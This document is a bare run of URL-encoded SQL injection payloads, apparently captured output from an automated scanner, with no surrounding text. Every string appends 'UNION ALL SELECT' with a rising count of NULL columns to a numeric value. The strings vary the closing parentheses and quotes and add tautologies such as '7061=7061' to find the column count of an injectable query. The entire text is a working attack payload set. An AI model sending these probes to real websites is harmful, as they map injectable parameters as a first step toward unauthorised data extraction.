1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287061%3D7061 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289675%3D9675 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289449%3D9449 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283082%3D3082 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283793%3D3793 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284199%3D4199 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285569%3D5569 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%286365%3D6365 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283012%3D3012 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283074%3D3074 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281603%3D1603 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282094%3D2094 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284314%3D4314 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283661%3D3661 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284661%3D4661 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286333%3D6333 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287469%3D7469 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283627%3D3627 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284187%3D4187 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286416%3D6416 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287537%3D7537 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288089%3D8089 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284554%3D4554 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285586%3D5586 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288162%3D8162 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281941%3D1941 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284488%3D4488 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286405%3D6405 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289578%3D9578 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285443%3D5443 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ooRP%27%3D%27ooRP 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27vVCj%27%3D%27vVCj 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27eIaf%27%3D%27eIaf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27KOMp%27%3D%27KOMp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Qnxz%27%3D%27Qnxz 